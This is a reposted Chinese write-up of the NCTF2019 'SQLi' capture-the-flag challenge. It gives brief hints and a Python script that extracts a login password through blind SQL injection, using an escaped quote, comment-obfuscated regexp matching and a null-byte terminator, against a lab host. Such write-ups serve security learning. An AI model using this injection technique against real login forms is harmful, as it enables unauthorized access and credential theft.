碼上快樂

相關內容    簡體    繁體

[NCTF2019]SQLi

本文轉載自   查看原文   2020-08-08 22:47   824 

[NCTF2019]SQLi

  • robots.txt有個hint.txt
  • hint.txt說只要密碼對就給flag
  • Mysql的正則表達式 regexp
import requests
import string
url = "http://5f80822e-bbf0-4050-ba1b-6fc9c1783ad4.node3.buuoj.cn/"
str_list = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_"

password= ""
while(True):
	for j in str_list :
		data = {
			"username" : "\\",
			"passwd" : '||/*1*/passwd/*2*/regexp/*3*/"^%s";%s' % (password+j,chr(0))
		}
		r = requests.post(url,data=data)
		if("welcome" in r.text):
			password += j
			print(password)
			break


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [NCTF2019]True XML cookbook sqli-labs(27) sqli-libs(7) Sqli-labs less 1 搭建sqli靶場 docker的基本使用(sqli-labs) Sqli-labs less 46 sqli-二次注入 sqli-labs(十二)(and和or的過濾) sqli-labs環境搭建
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM